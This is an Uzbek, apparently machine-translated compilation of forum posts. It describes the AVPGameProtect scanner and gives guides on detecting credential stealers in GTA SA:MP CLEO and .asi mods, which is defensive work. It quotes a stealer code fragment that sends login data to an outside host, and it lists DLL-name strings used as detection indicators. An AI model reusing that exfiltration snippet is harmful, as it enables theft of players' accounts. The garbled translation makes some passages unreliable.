Birinchi ASI styler ishlab chiqilgan kunlarda paydo bo'lgan birinchi skaner. Stiler paydo bo'lgandan keyin ertasi kuni men o'zimning piyodalarga qarshi vositani ishlab chiqa boshladim.

Skaner quyidagi modullarni o'z ichiga oladi:
- YARA imzo mexanizmi (bunday kuchli vosita uchun Virustotal dasturlash jamoasiga rahmat),
- Andreas Jonsonning skript dvigateli (AngelScript), tezlik, joylashtirish qulayligi va bitta loyihaga o'xshash skriptlarning go'zalligi. Aynan unga rahmat, siz CLEO uchun kriptorlarni tez va texnik jihatdan ochishingiz mumkin.
- CLEO kriptolarini yaxshi targ'ib qila oladigan SCM kod emulyatori (mendan)

Dastur xususiyatlari:
- Taxminan 2014 yildan beri o'sib borayotgan o'g'rilarning juda katta ma'lumotlar bazasi. Biz bir nechta katta va unchalik katta bo'lmagan saytlardan bir nechta zararli modlarni to'pladik.
- Papkalar va fayllarni dastur oynasiga sudrab olib skanerlash imkoniyati.
- Xulosa qisqacha ma'lumot O zararli dastur(turi, ishlab chiquvchining taxallusi va ma'lumotlar bazasining eski versiyalarida distribyutorlarning taxalluslari)
- As, dll, cleo, sf, cs va boshqa imkoniyatlarni skanerlang xavfli fayllar.
- O'zgartirilgan kengaytmali fayllarda zararli kodni aniqlash, masalan, yaqinda o'g'rilar nomini txd fayllariga o'zgartirish va ularni yuklovchi yordamida o'yinga yuklash moda edi.
- Shifrlangan CLEO skriptlarini ochish va keyinchalik skanerlash (ta'kidlash kerakki, u faqat ma'lum va biz duch kelgan kriptorlarni shifrlaydi, ammo bu haqiqatni tuzatish oson, bizga elektron pochta orqali yozing va faylni yuboring). Ochilmagan skriptni skanerlaganingizda, uning manbasini temp\decrypt.cs faylida topishingiz mumkin.
- SCM kodini tezda taqlid qiling va skript shifrini hal qiling, so'ngra zararli kodni tekshiring. (Agar zararli kod aniqlansa, temp\decrypt.cs dagi dumpni ko'ring)
- Do'stona va intuitiv dastur interfeysi.
- Yuqori tezlik ko'p sonli fayllarni tekshirishda skanerlash.
- Topilgan faylni matn va olti burchakli rejimlarda o'rnatilgan ko'rish

Ayniqsa, muhim nuqta! Ahmoqona savollar bermaslik uchun uni hamma o'qishi kerak.
Skaner ishlab chiqilgan faqat arxivdan chiqarilgan o'yin modifikatsiyalarini tekshirish uchun, boshqa har qanday holatda bu foydasiz!
U ham mo'ljallanmagan o'rnatuvchilar va avtomatik o'rnatuvchilar uchun, msi, exe paketlari, pif, mmbak, com, scr, vbs, bat, cmd, js va o'yin rejimlarida topilmaydigan boshqa potentsial xavfli fayllar uchun ushbu fayllar uchun antiviruslar mavjud!
Shuningdek Butun tizimni skanerlash EMAS, bu foydasiz va hech qanday ma'noga ega emas. Ushbu skaner mod sinovidan o'tgan va faqat mods uchun mo'ljallangan. Siz o'yin papkasini skanerlashingiz mumkin, ammo bu erda siz o'yinda Internetga kira oladigan va brauzer oynasida ko'rishga tayyor bo'lgan fayllar mavjudligini tushunishingiz kerak.

Men sizni darhol ogohlantirmoqchiman bu dastur boshqa antivirus yoki skaner kabi hisoblaringizni 100% himoya qilmaydi. Ular antivirus qopqog'iga 100% himoya yozishganda, men uchun bu allaqachon antivirusni diskdan olib tashlash uchun signaldir. Ammo bu skaner allaqachon ma'lum bo'lgan o'g'rilarni tekshirishni tezlashtirishi va tajribasiz distribyutorlarning o'ljasiga tushib qolmaslikka yordam beradi.
Ko'pchilik eng yaxshi antivirus- bu sizning boshingiz va qarorlaringiz - yuklab olish yoki yuklab olmaslik. Modlarni faqat ishonchli saytlardan va arxiv xavfsizligi nazorat qilinadigan joylardan yuklab oling.


Dastur muallifi sizning qarorlaringiz va skaner tomonidan o'tkazib yuborilgan o'g'irliklar uchun javobgar emas.

Biroz shartli belgilar dasturlari:

Diqqat! Internetga ulanishi mumkin bo'lgan fayl aniqlandi, uni o'yinga o'rnatishdan oldin bu haqda o'ylab ko'rishingiz kerak. Ammo bu skriptning avtomatik yangilanishi ham bo'lishi mumkin. Faylda URL manzili ham bo'lishi mumkin. Bularning barchasi fayllarni qo'lda tekshirish qobiliyatingizga bog'liq.

CLEO styler topildi, fayl ochildi va siz manbaga qarashingiz mumkin.

Skaner skriptni ochishga harakat qildi, lekin u ishlamagan bo'lishi mumkin yoki zararli kod topilmadi. Temp papkasida manbani ko'ring. Fayl shifrlanmaganligiga ishonch hosil qiling. Bu erda siz skriptni qo'lda tekshirishingiz kerak.

Ochiq shaklda CLEO stendlari topildi.

Zararli dasturlarni kompyuteringizga yuklaydigan fayl topildi

Mashhur loyihadan Stiller topildi

Himoya topildi, fayl xavf tug'dirishi mumkin. Bu erda siz faqat muallifning halolligi va obro'siga tayanishingiz kerak. Muallifdan fayl nima uchun shifrlanganini (himoyalanganligini) so'rang va keyin javobning adekvatligi haqida o'zingiz o'ylab ko'ring. Bu fayl xavfli bo'lishi mumkin.

Ehtimol, fayl boshqa dastur tomonidan bloklangan yoki fayl nolga teng

Men bunday fayllarni o'yinga qo'yishni tavsiya etmayman. Bu erda hamma narsani kutish mumkin. Bu bir nechta fayllarni bitta faylga birlashtiradi. Ushbu fayllar orasida o'g'irlik yoki boshqa zararli dastur bo'lishi mumkin. Yelimlarga ishonmang. Yelimlash xavfsiz ekanligiga faqat uni fayllarga ajratish va har bir faylni alohida tekshirish orqali ishonch hosil qilishingiz mumkin.

Dasturni faqat rasmiy manbalardan yuklab olishingizni iltimos qilamiz. Bu eng ko'p bo'ladi xavfsiz variant.
Iltimos, har qanday xatolar haqida elektron pochta orqali yoki ushbu mavzuda yozing.


Hisobni dinamik himoya qilish uchun DarkP1xel-dan maxsus plagindan foydalanishni tavsiya etamiz.

Ushbu plagin skriptlar va boshqa rejimlardagi xavfli funksiyalarni bloklaydi.
Agar sizda ushbu plagin o'yinda o'rnatilgan bo'lsa, modlar uchinchi tomon serverlariga veb-so'rovlarni yubora olmaydi, bu sizning parolingiz noto'g'ri qo'llarga tushmasligini anglatadi, hatto siz tasodifan o'g'irlikni o'rnatgan bo'lsangiz ham. o'yin. Plagin shuningdek, o'yindagi barcha shubhali hodisalarning batafsil jurnalini saqlaydi. Muhim. Plagin doimiy ravishda yangilanadi, bizni kuzatib boring.
p.s: plagin uchun muallifga rahmat aytishni unutmang;)

Bizga yordam bergan barchaga rahmat.
Gedwadion, DarkP1xelga alohida rahmat. Bular IT xavfsizligi sohasida kelajagi bor ajoyib yigitlar.

Mualliflar:
smalloff - ishlab chiqish, loyihani qo'llab-quvvatlash
andre500 - test, loyihani qo'llab-quvvatlash
Mualliflarning veb-saytlari (rasmiy manbalar): sayti, Libertycity.ru
Pochta: smalloff@sayt
Dasturni yuklab oling:AVPGameProtect18042019.rar
Dastur ishlab chiqaruvchisini pivo bilan muomala qiling (oldindan rahmat): Yandex filtrlanmagan

(Diqqat! Ommaviy loyihani qo‘llab-quvvatlash butunlay to‘xtatildi.)

[Chonishvilining jiddiy ovozi]: Ko'p so'zlarsiz. Ko'rsatuvni buzing. Men buni yozayotganimda, sizning byulleteningiz va BB-dagi villangiz allaqachon davlatga birlashtirilgan va virtuallar hujumchiga o'tkazilgan, ah-ha-ha-ha, yo'tal yo'tal yo'tal yo'tal *bo'g'ilib qolgan*

Siz fartlaringizni sovutishingiz mumkin, chunki cleo fayllari saytga yuklanmagan. Ammo bu ularning Samp-Rp loyihasida taqiqlanganligini anglatmaydi. Sarosimaga tushmang, jin ursin!
Modifikatsiyalarning barcha muxlislari "Stiller" atamasi tushunchasiga duch kelishdi (aka Keylogger, lekin bu boshqa hikoya). Odatda, stendlar ularni kleo-skriptlarga joylashtiradilar, biz hozir bu haqda gaplashamiz.

Kleo skripti nima?

Men cleo skripti nima ekanligini tushuntirmayman. umumiy tushuncha, keling, to'g'ridan-to'g'ri onlayn o'yinga o'tamiz. SA:MP"a uchun Cleo-skriptlar o'yin qulayligini oshirish uchun mo'ljallangan. Ularning yordami bilan siz interfeysni o'zingizga mos ravishda o'zgartirishingiz mumkin. Turli xatolar, nosozliklar va hokazolarni tuzating. Ammo zararli (yoki aldash) cleo ham mavjud. -skriptlar (cheat - aldash dan. Ingliz), qaysi, darvoqe, qat'iy Samp-Rp loyihasida taqiqlangan . Ular hayotdan xafa bo'lgan va maktabda kaltaklangan bolalar uchun yaratilgan. Xo'sh, siz iborani kiritmasdan iloji yo'q: "Chits Viagraga o'xshaydi, buni o'zlari qila olmaydiganlar uchun."
Eng mashhur kleo-skriptlar ( .c arslon s cript fayllari) - bu raqamlardagi HP ko'rsatkichi, kvadrat radar, FPS ni oshiradigan skript, turli xil zirhlar va sog'liq chiziqlari (ba'zida bu shunchaki chiziqlar emas, balki sizning sevimli qahramoningiz, masalan A$AP Rokki. HP pasayganda, fotosurat yo'qoladi va faqat siluet qoladi).
Ko'p odamlarni savol qiynayapti, nega saytda enb seriyasi yo'q? Gap shundaki .asi format, bu ham cleo fayli, faqat tuzilgan. Ya'ni, siz unga stilerni ham tikishingiz mumkin.
Saytda baribir Cleo bo'lmasa nega mavzu yozyapman deb hayron bo'layotgandirsiz. Lekin bu saytda emas, lekin uni o'z ichiga olish uchun sizga hech bo'lmaganda StreamMemFix1.0 kerak .asi Va bu GTA uchun juda ko'p tuzatishlardan biri bo'lib, har bir muxlis o'z San'ini to'ldiradi Modalar Andreas quvvatga keltiring va shu bilan undan konfet tayyorlang. Va men c-huds va boshqa modifikatsiyalar haqida sukut saqlayapman, keyin bu mavzu siz uchun!

Styler uchun .cs faylini qanday tekshirish mumkin?

Eng keng tarqalgan usul - dastur orqali tekshirish Wireshark. Sizga kerak bo'lgan hamma narsa:

• 1. Dasturni o'zi yuklab oling (buni rasmiy veb-saytdan qilishingiz mumkin).
• 2. Ushbu videoni tomosha qiling, u erda hamma narsa aniq tushuntirilgan.
  

=====================================================================================================

Cleo-ni Stiller uchun tekshirishning ikkinchi usuli. IN oxirgi versiya cleo-kutubxonalar keladi qo'shimcha dasturlar, ulardan biri deyiladi Quyoshli quruvchi- bizga nima kerak.

0AB1: call_scm_func @stealer_by_mg 0 1@
:mg__steal__format_url

"http:" 2f 2f "candyquendy.hol.es " 2f "acci" 2f "add.php?" 00

candyquendy.hol.es - hisob ma'lumotlari yuboriladigan sayt.
@stealer_by_mg 0 1@ o'g'rining o'zi ishlab chiqaruvchisi.

=================================================================================================

Bundan tashqari, faylni o'g'irlik uchun tekshirishning uchinchi usuli mavjud. "steal_logger" skripti mavjud .asi"Biz uni tekshirish uchun foydalanamiz.
(Ha, uning o'zi cleo formati, lekin agar siz u bilan bazaga borishni o'ylamasangiz, tashvishlanadigan hech narsa yo'q). Men sizga havola bermayman, uni Internetda qidiring.
Men uni qanday ishlatishni qisqacha tushuntiraman.

• 1. Uni o'yin papkasiga qo'ying.
• 2. Keling, boraylik har qanday SA:MP server, ostida har qanday hech kim
• 3. Biz har qanday parolni o'ylab topamiz, tizimga kiring va o'yinni yopamiz.
• 4. U jildda yaratilishi kerak matn fayli (.Xabar format). Unga bosing va matnda biz serverimizning IP-si va yangi ro'yxatdan o'tgan hisob paroli bilan qatorni qidiramiz. Topildi - bu xakerda bu ma'lumotlar allaqachon borligini anglatadi. Qamchi o'ynagani kirsa xursand bo'lsin. Va bu vaqtda biz oxirgi cleo faylini o'chirib tashlaymiz.

[!] Chek sifatida foydalaning faqat yangi yaratilgan hisoblar, ushbu skript bilan asosiy hisoblaringizga kirmang. Tekshirgandan so'ng, skriptlarni tekshirish uchun GTA ning alohida nusxasini oling \ yoki o'chiring [!]

.asi faylini o'g'irlik uchun qanday tekshirish mumkin?

Oson qism tugadi. Endi tekshirishni o'rganamiz .asi-fayllar, chunki stiler ularda Wiresharkni ko'rmaydi. Nima qilsa bo'ladi? Men bir nechta eng mashhur usullarni e'lon qilaman.

Ko'pchilik samarali usul tekshiruvlar. Dastur orqali tekshirish IEInspector HTTP analizatori.

===============================================================================================================

Ikkinchi usul - bloknot yordamida kodni tekshirish.

• 1. Ochilish .asi Notepad orqali.
• 2. Keling, kodni ko'rib chiqaylik.

Pure when misoli (No stiller)

Kod bilan misol tinchroq(kernel.dll emas)

Keling, oxirgi satrlarga e'tibor beraylik.

Yashirin o'g'irlik uchun yana bir variant - kodning o'zida "urlmon.dll", "wininet.dl l", "wsock32.dll" matnidagi nomlar. Yoki qator " kernel32.dll ExitProcess user32.dll MessageBoxA wsprintfA LOADER XATOSI"

========================================================================================================

"Ma'muriyat yo'qolgan hisoblarni tiklamaydi"- ular aytishdi.
"Hisob xavfsizligi sizning qo'lingizda". Umid qilamanki, ushbu mavzuni o'qib bo'lgach, sizning "qo'llaringiz" kuchliroq bo'ldi. Hisoblaringizga g'amxo'rlik qiling.

2015-2015 © Turli forumlardan to'plangan.

AVPGameProtect izlashga yordam beruvchi dasturdir zararli fayllar o'yin modifikatsiyalarida. asosiy xususiyat dasturlarni boshqa anti-o'g'irlovchilardan oldinda - ommaviy skanerlash imkoniyati, ya'ni siz mutlaqo har qanday fayllarni va istalgan hajmda skanerlashingiz mumkin, shunchaki uzatishingiz mumkin. kerakli fayllar yoki dastur oynasiga fayllari bo'lgan papkani oching va skanerlash natijalarini kuting.

Dastur xususiyatlari:
- 2014 yildan beri olib borilayotgan o'g'rilarning katta ma'lumotlar bazasi.
- asi, dll, cleo, sf, cs va boshqa xavfli fayllarni skanerlang.
- Ko'p sonli fayllarni skanerlashda yuqori tezlik.
- Dastur oynasida o'g'irlik haqida ma'lumotni ko'rsatish (o'g'irlik turi yoki ishlab chiquvchining taxallusi).
- Topilgan fayllarni matn va olti burchakli rejimlarda o'rnatilgan ko'rish.
- Internet bilan o'zaro ishlash yoki fayllarni yuklab olish uchun funksiyalarni qidiring.
- CLEO skriptlarini o'g'irlovchi borligini tekshirish (barchasi emas, faqat dasturga ma'lum bo'lgan kriptorlari bo'lganlar). Shifrlangan skript temp papkasida, dasturning ildiz papkasida decrypt.cs nomi ostida paydo bo'ladi.
- SR_Team va boshqalardan FuncCrypt transkripti.
- Dasturni doimiy qo'llab-quvvatlash.

Skaner o'rnatuvchilar va o'yin tuzilmalarini tekshirish yoki kompyuterni to'liq skanerlash uchun mo'ljallanmagan. Skanerlash uchun siz arxivdan papka yoki fayllarni chiqarib, dasturga sudrab olib borishingiz kerak.

Shuni ham ta'kidlash kerakki, dastur foydalanuvchilarni 100% himoya qilmaydi. Boshqa har qanday anti-o'g'irlik singari, u faqat unga ma'lum bo'lgan o'g'rilarni aniqlash uchun mo'ljallangan va u yoki bu moddan foydalanish bo'yicha keyingi qaror to'g'ridan-to'g'ri sizga bog'liq va muallif SIZNING qarorlaringiz uchun javobgar emas. Dastur doimiy ravishda yangilanadi.

Ba'zi dastur konventsiyalari:
InetLoader- Diqqat! Internetga ulanishi mumkin bo'lgan fayl aniqlandi, yuklab olishdan oldin bu haqda o'ylab ko'rishingiz kerak. Ammo bu skriptning avtomatik yangilanishi ham bo'lishi mumkin.
CLEO_Stealer - CLEO styler topildi, fayl ochildi va siz manbaga qarashingiz mumkin.
CLEO_Crypter - Skaner skriptni ochishga harakat qildi, ehtimol u ishlamadi yoki zararli kod topilmadi. Temp papkasida manbani ko'ring.
CLEO_Stealer- CLEO-ni ochiq shaklda topildi.
Downloader_stealer- Kompyuteringizga zararli dasturlarni yuklaydigan fayl topildi
Stealers_ru- Mashhur loyihadan stul topildi
Danger_VMProtect- Himoya topildi, fayl xavf tug'dirishi mumkin
Skanerlash amalga oshmadi - Fayl boshqa dastur tomonidan bloklangan bo'lishi mumkin yoki fayl nolga teng
JoinFiles- Skaner bitta faylga birlashtirilgan bir nechta faylni topdi. Ushbu fayllar orasida o'g'irlik yoki boshqa zararli dastur bo'lishi mumkin.

Qanday qilib o‘g‘riga duch kelmaslik mumkin?!

Stealer - bu zararli kodli faylni GTA jildiga nusxalash orqali o'rnatiladigan skript. O'rnatishdan so'ng, har safar o'yin serveriga kirganingizda, u dialoglardagi barcha kiritilgan ma'lumotlarni (pin kodlar, parol, maxfiy kalitlar, ma'lumotlar) o'qiydi va ularni tajovuzkorga yuboradi. Shunday qilib, oddiygina skriptni GTA papkasiga o'rnatish orqali, agar siz dialogga to'g'ri ma'lumotlarni kiritsangiz, barcha o'yin hisoblaringizni yo'qotishingiz mumkin.

Yoniq bu daqiqa Turli Samp serverlarida o'yin hisoblarini o'g'irlash holatlari tez-tez uchrab turadi. Ko'pincha bu rol o'ynash rejimiga ega serverlardir, chunki o'yin valyutasi o'z qiymatiga ega. Hujumchilar sizning ahmoqligingizdan pul ishlashadi. Ushbu maqolada men sizga o'zim bilgan usullarni ko'rsataman. Bilasizmi, bu o'g'rilarni qiladigan odamlar "Agar yemasangiz, yashay olmaysiz" tamoyili bilan yashaydilar.

Asosiy maslahatlar:

1. Siz o'ynagan loyiha ma'muriyati tomonidan taqdim etilgan hisobni himoya qilish uchun har doim barcha usullardan foydalaning. (Grafik PIN-kod, SMS bilan bog'lash va boshqalar. Bularning barchasi serverning funksionalligiga bog'liq).
2. Iloji boricha uzoqroq va murakkab tuzilishga ega paroldan foydalaning.
3. Boshqalarda ishlatadigan parol bilan serverga kirmang.
4. Hisobingiz ma'lumotlarini 100% ishonchingiz komil bo'lmagan odam bilan baham ko'rmang.
5. O'yinda turli xil maxsus modifikatsiyalardan foydalanishni maslahat bermayman. Ularda shifrlangan virus (Stiller) bo'lishi mumkin. Stiller (ingliz tilidan o'g'irlash, o'g'irlash) - bu troyanlarning ma'lum bir sinfi (zararli dastur, viruslar - xohlaganingizcha), uning funksionalligi butunlay tizimda saqlangan parollarni o'g'irlash va ularni "muallif" ga yuborishdan iborat.
O'g'irlik rejimini o'rnatganingizdan so'ng, o'yinga kirishda siz parolingizni kiritasiz va u o'g'rining qo'liga muvaffaqiyatli o'tadi. Ko'pincha modlarga o'rnatilgan (Kaput, grafik sozlamalari va Asi plagini).
6. Antivirusdan foydalaning! Bu sizga saqlangan pochta yoki hisob qaydnomangizni zararlangan saytlarga yuborishga ruxsat bermaydi (gribers va o'g'rilardan himoya (exe)).
7. SA:MP server ma'muriyati buzilgan hisoblarni tiklamaydi va yo'qolgan pullarni qaytarmaydi va hech qachon hisobingiz parollarini so'ramaydi.

Birinchi yo'l.

Va shuning uchun birinchi usul 100% samarali !!!
Agar siz turli xil modlarni, cleo skriptlarini, hiyla-nayranglarni yuklab olmasangiz, sizda hech qanday muammo bo'lmaydi va o'g'rilar YO'Q!

Veb-sayt orqali tekshiring:

Birinchi usul barcha xakerlardan himoya qiladi, ammo bu hamma uchun mos emas.
Va shuning uchun ikkinchi usul skriptlarni, turli xil modlarni, kaputlarni, cheatlarni va hokazolarni yuklab olganlar uchun javob beradi. Shuning uchun, menda siz uchun chiqish yo'li bor, lekin bu sizni 100% himoya qilmaydi! Fayllarni tekshiradigan sayt turli skriptlar, mana shu yerda . Saytga tashrif buyurib, o'qishingiz mumkin "

Oʻgʻrilarning eng yangi versiyalarida .txd .dff .png .dat formatlari boʻlishi mumkin. Lekin ular .asi .cs .sf plaginlariga ulangan va ulanishsiz ishlamaydi. Shuning uchun tekshirgichimiz yordamida barcha plaginlar va skriptlarni tekshiring. GTA-da yashirin fayllaringiz bo'lsa, ularni o'chirib tashlang.

Bundan shunday xulosaga keldikki, endi stendlar oddiy fotosuratni hatto .png faylida ham modlarga joylashtirishlari mumkin. Ko'pchilik aytadi

"Sen qo'ymisan, yo'qol!

Yigitlar yo'q, hatto oddiy rasmda ham ko'rishimiz mumkin, qurol.png, deylik, men bilaman, balki o'g'irlik! Biz har doim har qanday modni tekshiramiz, qanday qilib birovga ishonasiz. Shunday qilib, biz faylni harakatsiz deb tekshirganimizda, agar u ochilib qolsa

Qidiruv natijalari haqida ma'lumot:

Oʻgʻri topilmadi:

Faylni skanerlash paytida hech qanday zararli kod yoki shubhali narsa topilmadi. Bu sizning hisobingiz haqida qayg'urmasligingizni anglatadi, bizning tekshirgichimiz hamma narsadan foydalanadi mumkin bo'lgan usullar skriptlarda zararli kodni aniqlash.

Dastur xususiyatlari:
- Taxminan 2014 yildan beri o'sib borayotgan o'g'rilarning juda katta ma'lumotlar bazasi. Biz bir nechta katta va unchalik katta bo'lmagan saytlardan bir nechta zararli modlarni to'pladik. Taqdim etilgan namunalar uchun Gtavicecity.ru saytiga alohida rahmat.
- Papkalar va fayllarni dastur oynasiga sudrab olib skanerlash imkoniyati.
- Zararli dastur haqida qisqacha ma'lumotni ko'rsatadi (turi, ishlab chiquvchining taxallusi va distribyutor ma'lumotlar bazasining eski versiyalarida)
- asi, dll, cleo, sf, cs va boshqa xavfli fayllarni skanerlang.
- O'zgartirilgan kengaytmali fayllarda zararli kodni aniqlash, masalan, yaqinda o'g'rilar nomini txd fayllariga o'zgartirish va ularni yuklovchi yordamida o'yinga yuklash moda edi.
- Shifrlangan CLEO skriptlarini ochish va keyinchalik skanerlash (ta'kidlash kerakki, u faqat ma'lum va biz duch kelgan kriptorlarni shifrlaydi, ammo bu haqiqatni tuzatish oson, bizga elektron pochta orqali yozing va faylni yuboring). Ochilmagan skriptni skanerlaganingizda, uning manbasini temp\decrypt.cs faylida topishingiz mumkin.
- SCM kodini tezda taqlid qiling va skript shifrini hal qiling, so'ngra zararli kodni tekshiring. (Agar zararli kod aniqlansa, temp\decrypt.cs dagi dumpni ko'ring)
- Do'stona va intuitiv dastur interfeysi.
- Dasturning juda oddiy kontseptsiyasi, ya'ni uni osongina va tez-tez yangilash mumkin.
- Ko'p sonli fayllarni skanerlashda yuqori skanerlash tezligi.
- Topilgan faylni matn va olti burchakli rejimlarda o'rnatilgan ko'rish

Skaner faqat arxivdan chiqarilgan o'yin modifikatsiyalarini tekshirish uchun mo'ljallangan, boshqa hollarda u foydasizdir.
Shuningdek, u o'rnatuvchilar va avtomatik o'rnatuvchilar uchun mo'ljallanmagan.

DIQQAT!!!
Men sizni darhol ogohlantirmoqchimanki, ushbu dastur boshqa antivirus yoki brauzer kabi hisoblaringizni 100% himoya qilmaydi. Ular antivirus qopqog'iga 100% himoya yozishganda, men uchun bu allaqachon antivirusni diskdan olib tashlash uchun signaldir. Ammo bu skaner allaqachon ma'lum bo'lgan o'g'rilarni tekshirishni tezlashtirishi va tajribasiz distribyutorlarning o'ljasiga tushib qolmaslikka yordam beradi.
Eng yaxshi antivirus - bu sizning boshingiz va qarorlaringiz - yuklab olish yoki yuklab olmaslik. Modlarni faqat ishonchli saytlardan va arxiv xavfsizligi nazorat qilinadigan joylardan yuklab oling.

Ba'zi dastur konventsiyalari:

RIVOJLANISHDA

HttpAnalyzer - bu tarmoq trafigi analizatori. Agar siz HTTP va HTTPS trafigini real vaqt rejimida kuzatish bo'lgan funktsional vositani qidirayotgan bo'lsangiz, menimcha, bu dastur sizga yoqadi, bu ulanishlar haqida barcha kerakli ma'lumotlarni aniq ko'rsata oladigan o'ziga xos sniffer!

Umuman olganda, HTTP Analyzer juda ko'p narsalarni qila oladi, menimcha, rasmiy veb-saytda batafsilroq o'qishingiz mumkin, men asosiy fikrni yozdim.